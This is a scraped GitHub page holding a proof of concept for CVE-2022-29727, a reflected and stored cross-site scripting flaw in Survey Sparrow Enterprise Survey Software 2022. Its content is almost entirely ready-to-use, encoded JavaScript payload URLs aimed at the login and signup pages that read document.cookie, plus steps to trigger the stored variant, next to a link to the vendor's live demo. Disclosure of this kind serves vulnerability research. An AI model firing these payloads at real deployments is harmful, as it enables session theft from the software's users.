Headline
CVE-2022-29727: Enterprise-Survey-Software/Enterprise-Survey-Software 2022 at main · haxpunk1337/Enterprise-Survey-Software
Survey Sparrow Enterprise Survey Software 2022 has a Stored cross-site scripting (XSS) vulnerability in the Signup parameter.
Permalink
main
Switch branches/tags
Enterprise-Survey-Software/Enterprise-Survey-Software 2022****
Go to file
Go to file
Copy path
Copy permalink
Cannot retrieve contributors at this time
18 lines (11 sloc) 452 Bytes
Raw Blame
- Open with Desktop
- View raw
- Copy raw contents
- View blame
Product: Enterprise-Survey-Software 2022
For Reflected XSS
https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
For Stored XSS
Visit https://LOCALHOST/login?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
now click on signup button
or
visit
https://LOCALHOST/signup?test=Javascript%26colon;%252F%252F%E2%80%A9confirm?.(document.cookie)//
For demo
https://app.surveysparrow.com/
Related news
Survey Sparrow Enterprise Survey Software 2022 suffers from a persistent cross site scripting vulnerability.
Survey Sparrow Enterprise Survey Software 2022 has a Stored cross-site scripting (XSS) vulnerability in the Signup parameter.